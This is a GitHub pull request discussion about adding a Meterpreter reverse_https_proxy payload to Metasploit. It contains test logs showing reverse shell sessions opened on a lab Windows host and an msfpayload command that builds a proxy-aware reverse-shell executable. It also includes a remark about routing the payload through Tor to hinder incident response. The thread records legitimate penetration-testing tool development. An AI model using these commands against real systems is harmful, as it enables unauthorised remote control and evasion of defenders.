New payload meterpreter reverse_https_proxy #1044

Closed
wants to merge 6 commits into from

9 participants

@corelanc0d3r

This payload is a variation on the reverse_https payload.

It allows you to specify a custom proxy IP and port,
and all http/https traffic will be forced to use that proxy,
regardless of the system proxy settings.

Will post test results in a few moments.

Note : I have compiled metsrv.dll with MS Visual C++ 2010 Express.
The binary appears to be smaller, but works well.
If you're cautious about using the dll in this PR, feel free to recompile.
Changes to server_setup.c are part of this PR, so this should be trivial.

@corelanc0d3r

Test results:

reverse_tcp

Juans-MacBook-Pro:msfdev juan$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.129
[*] Started reverse handler on 192.168.1.129:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.178
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.178:1999) at 2012-11-08 12:15:22 +0100

meterpreter > getuid
sServer username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

reverse_http no system proxy

Juans-MacBook-Pro:msfdev juan$ rvmsudo ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_http LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_http
LHOST => 192.168.1.129
[*] Started HTTP reverse handler on http://192.168.1.129:8080/
[*] Starting the payload handler...


[*] 192.168.1.178:2058 Request received for /5nJo...
[*] 192.168.1.178:2058 Staging connection for target /5nJo received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 1 opened (192.168.1.129:8080 -> 192.168.1.178:2058) at 2012-11-08 12:19:26 +0100

meterpreter > 
meterpreter > 
meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https no system proxy

Juans-MacBook-Pro:msfdev juan$ rvmsudo ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_https
LHOST => 192.168.1.129
[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...
[*] 192.168.1.178:2152 Request received for /j8wC...
[*] 192.168.1.178:2152 Staging connection for target /j8wC received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:2152) at 2012-11-08 12:20:13 +0100

meterpreter > getuid
sServer username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https_proxy (obviously with proxy)

msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https_proxy):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXITFUNC   process          yes       Exit technique: seh, thread, process, none
   LHOST                       yes       The local listener hostname
   LPORT      8443             yes       The local listener port
   PROXYHOST  192.168.1.178    yes       The IP address of the proxy to use
   PROXYPORT  8080             no        The Proxy port to connect to


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > set LHOST 192.168.1.129
LHOST => 192.168.1.129
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...
[*] 192.168.1.178:2798 Request received for /SVnE...
[*] 192.168.1.178:2798 Staging connection for target /SVnE received...
[*] Patched user-agent at offset 641512...
[*] Activated custom proxy 192.168.1.178:8080, patch at offset 641776...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:2798) at 2012-11-08 13:23:38 +0100

meterpreter > 


Juans-MacBook-Pro:msfdev juan$ ./msfpayload windows/meterpreter/reverse_https_proxy LHOST=192.168.1.129 LPORT=8443 PROXYHOST=192.168.1.178 PROXYPORT=8080  X > met-reverse_https_proxy.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https_proxy
 Length: 400
Options: {"LHOST"=>"192.168.1.129", "LPORT"=>"8443", "PROXYHOST"=>"192.168.1.178", "PROXYPORT"=>"8080"}

reverse_http with system proxy active

msf  exploit(handler) > set LPORT 8081
LPORT => 8081
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The local listener hostname
   LPORT     8081             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTP reverse handler on http://192.168.1.129:8081/
[*] Starting the payload handler...
[*] 192.168.1.178:4110 Request received for /t2pF...
[*] 192.168.1.178:4110 Staging connection for target /t2pF received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 2 opened (192.168.1.129:8081 -> 192.168.1.178:4110) at 2012-11-08 14:00:19 +0100

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https with system proxy active

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > set LHOST 192.168.1.129
LHOST => 192.168.1.129
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...

[*] 192.168.1.178:3867 Request received for /yZR7...
[*] 192.168.1.178:3867 Staging connection for target /yZR7 received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:3867) at 2012-11-08 13:55:19 +0100

meterpreter > 
meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
@jvazquez-r7

Helped @corelanc0d3r with basic testing of reverse_tcp, reverse_http, reverse_https and reverse_https_proxy, just look at his pasties :)

Payloads are working well in the tests done.

In order to make easy testing of the reverse_https_proxy case, webscarab is working well. We used the version 20070504-1631: http://sourceforge.net/projects/owasp/files/WebScarab/20070504-1631/

@corelanc0d3r

yep, thanks a million, Juan, for testing !!

if anyone else wants to test, make sure all traffic is sent thru the proxy (in case a proxy is active, either via system proxy settings, or explicitely via reverse_https_proxy) and doesn't try to connect directly

@sempervictus

Compiled from source, tested extensively against a windows XP vm, pushing through polipo, outside proxies, and over http->socks->tor (which is going to make incident response that much more fun from here on out). The latter is obviously molasses slow, but functional.

One thing i noticed is that server_setup.c ended up with a bunch of odd ASCII trailing chars and whitespace. I cleaned up the source and threw it in a branch in my repo, but its just encoding conversion and an rstrip for every line.

Thank you for the payload, its sure to inspire security budget increases for 2013.

@corelanc0d3r

awesome, thanks for testing... :-)

@wchen-r7

This works for me, too. But I'm not sure how egypt wants to handle accepting the binary file. I get the impression he usually prefers to do it by himself.

@corelanc0d3r

heh of course - I don't expect anyone to trust/merge my dll...

luckily it's pretty easy to compile a fresh one nowadays.. :)

@mubix

bump?

@jlee-r7 jlee-r7 was assigned Mar 15, 2013
@wvu-r7

Any updates on this?

@mubix

I believe @jlee-r7 was waiting on @corelanc0d3r to split it between the meterpreter repo and msf one.

@corelanc0d3r

btw - troulouliou is working on an addition to this payload - I'm waiting for him to submit his patch to my repo and I'll submit it into the meterpreter repo

@wvu-r7

Thanks, @mubix and @corelanc0d3r. Trying not to close too many PRs. :P

@alexmaloteaux

hi coreland0d3r; sorry was off again during 1 month due to work duties; tor / hidden services is working through http proxy now; just nned to check some stuff for direct socks connection

@jlee-r7

@wvu-r7 @mubix Yes, we're waiting on the spit to the new rapid7/meterpreter repo. As soon as that's done, we should close this one.

@mubix mubix referenced this pull request in rapid7/meterpreter Jul 12, 2013
Closed

initial commit of pull #1044 to meter repo #11

@wvu-r7

That's what I was thinking, too, @jlee-r7.

@wvu-r7 wvu-r7 closed this Jul 12, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment